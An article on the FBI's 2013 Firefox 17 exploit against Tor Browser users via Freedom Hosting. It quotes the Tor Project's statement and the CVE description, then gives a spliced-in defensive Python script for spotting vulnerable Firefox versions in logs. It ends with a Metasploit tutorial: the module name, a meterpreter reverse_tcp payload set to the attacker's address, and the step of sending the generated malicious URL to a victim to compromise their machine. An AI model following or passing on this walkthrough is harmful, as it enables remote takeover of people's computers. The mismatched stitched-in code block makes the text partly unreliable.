The Tor network is an anonymizing network that allows people to browse the web and access other services without being traced. As part of this network, there is the so-called “darknet,” servers accessible only through Tor, which host a variety of services from forums to e-mail.

Tor does this by directing Internet traffic through a volunteer network of more than 3,000 relays to conceal the user’s location. While many of these services are innocent and aimed at those concerned about human rights abuses, the anonymity naturally attracts those with criminal intent, such as the distribution of child pornography. It is then impossible for law enforcement agencies to trace the original IP address.

The Story Behind FBI and the TOR Exploit

Eric Eoin Marques, a US-born 28-year-old living in Dublin, Ireland, is accused of being the chief architect behind Freedom Hosting, which is responsible for hosting child porn on 550 servers throughout Europe.

Freedom Hosting is a major hidden services hosting provider that can only be accessed through the Tor network.

Freedom Hosting and Marques have been associated with child pornography, so Tor released a statement claiming that they are in no way associated with the people running Freedom Hosting:

“The person, or persons, who run Freedom Hosting are in no way affiliated or connected to The Tor Project, Inc., the organization coordinating the development of the Tor software and research. In the past, adversarial organizations have skipped trying to break Tor hidden services and instead attacked the software running at the server behind the dot onion address. Exploits for PHP, Apache, MySQL, and other software are far more common than exploits for Tor. The current news indicates that someone has exploited the software behind Freedom Hosting. From what is known so far, the breach was used to configure the server in a way that it injects some sort of JavaScript exploit in the web pages delivered to users. This exploit is used to load a malware payload to infect user’s computers. The malware payload could be trying to exploit potential bugs in Firefox 17 ESR, on which our Tor browser is based. We’re investigating these bugs and will fix them if we can,” Tor said in a statement.

The FBI used a vulnerability in Firefox 17, on which the Tor Browser is based, to turn Freedom Hosting sites into malware-spreading tracking tools. It all relies on the Firefox 17 JavaScript zero-day exploit: the malicious script carries a tiny Windows executable, hidden in a variable named “Magneto,” which looks up the victim’s MAC address and hostname and sends them back in an HTTP request to a server in Virginia, exposing the user’s real IP address. The FBI gained access to the Freedom Hosting server and injected malicious HTML code, which first checks whether the user’s browser is Firefox 17 or not.

Firefox onreadystatechange Event DocumentViewerImpl Use After Free

Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not properly handle onreadystatechange events in conjunction with page reloading, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted web site that triggers an attempt to execute data at an unmapped memory location.

This module exploits a vulnerability found in Firefox 17.0.6, specifically a use after free of a DocumentViewerImpl object, triggered via a specially crafted web page using onreadystatechange events and the window.stop() API, as exploited in the wild in August 2013 to target Tor Browser users.
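A defender’s follow-up to the affected version ranges quoted above: this added example (not code from the article, from Mozilla, or from the Metasploit module) parses combined-format web server log lines, pulls the Firefox version out of the User-Agent header and flags clients whose build falls inside the advisory’s affected ranges, so they can be prioritized for patching. The log format, the group names and the sample log lines are constructed assumptions.

```python
import re
from typing import List, Optional, Tuple
# Affected ranges as stated in the advisory text above:
# Firefox before 22.0, and Firefox ESR 17.x before 17.0.7 (Thunderbird omitted).
FIREFOX_UA_RE = re.compile(r"Firefox/(\d+(?:\.\d+)*)")

# Apache/nginx combined log format; the group names are our own (assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_version(text: str) -> Tuple[int, ...]:
    """'17.0.6' -> (17, 0, 6); tuples compare component-wise."""
    return tuple(int(part) for part in text.split("."))

def is_affected(version: str) -> bool:
    """True if a Firefox version lies inside the advisory's affected ranges."""
    v = parse_version(version)
    if v[0] == 17:            # ESR 17.x branch, fixed in 17.0.7
        return v < (17, 0, 7)
    return v < (22,)          # mainline, fixed in 22.0

def firefox_version_from_ua(user_agent: str) -> Optional[str]:
    """Firefox version token from a User-Agent string, or None if not Firefox."""
    m = FIREFOX_UA_RE.search(user_agent)
    return m.group(1) if m else None

def affected_clients(log_lines: List[str]) -> List[Tuple[str, str]]:
    """(client_ip, version) for each request made by an affected Firefox build.
    Firefox's UA carries only major.minor (17.0, never 17.0.6), so every
    17.0 client is flagged for follow-up rather than assumed patched."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue            # malformed or non-combined-format line
        version = firefox_version_from_ua(m.group("ua"))
        if version and is_affected(version):
            hits.append((m.group("ip"), version))
    return hits

# Constructed sample log lines (private addresses, made-up timestamps).
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Aug/2013:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"',
    '10.0.0.6 - - [06/Aug/2013:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0"',
    '10.0.0.7 - - [06/Aug/2013:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0"',
    '10.0.0.8 - - [06/Aug/2013:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 Chrome/28.0 Safari/537.36"',
]
```

Running `affected_clients(SAMPLE_LOG)` flags the 17.0 and 21.0 clients and leaves the 23.0 and Chrome clients alone.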

Tutorial

Launch a terminal, run msfconsole, and type in use windows/browser/mozilla_firefox_onreadystatechange:

Next type in show options to check all the available options for this exploit:

As we can see in the above figure, there are some options for this exploit, and the required ones are marked “yes.” The first option is SRVHOST, the server host address; this means we have to set our local machine address here. The second option is SRVPORT; since the server port is showing 8080, port 8080 must be open for this module to run successfully.

Let us set all the required options; type in set SRVHOST 192.168.0.3:

Now we are going to set a payload in this exploit. So type in set PAYLOAD windows/meterpreter/reverse_tcp:

Now type in show options again to check all the options for the exploit and whether the payload is set or not. Here we can see that the exploit’s options are set, while the payload’s option still needs to be set.

So type in set LHOST 192.168.0.103:

Now we are ready to run this module; type in run:


Now we can see in the above figure that, after running the run command, a malicious URL http://192.168.0.103:8080/2Hek0bdO is generated in msfconsole. All that remains is to pass this URL to the victim.

If the victim is using the vulnerable version of Mozilla Firefox, we will get this type of screen and the victim is compromised:
